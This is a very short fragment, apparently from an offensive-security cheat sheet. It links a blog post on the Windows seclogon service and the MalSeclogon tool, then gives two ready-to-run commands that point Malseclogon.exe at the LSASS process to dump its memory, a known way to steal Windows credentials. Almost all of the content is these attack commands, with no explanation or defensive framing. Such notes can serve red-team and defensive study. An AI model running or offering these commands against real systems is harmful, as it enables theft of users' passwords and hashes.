* <https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html>
* <https://github.com/antonioCoco/MalSeclogon>

```
Cmd > Malseclogon.exe -p <LSASS_PID> -d 1
Cmd > Malseclogon.exe -p <LSASS_PID> -d 2
```
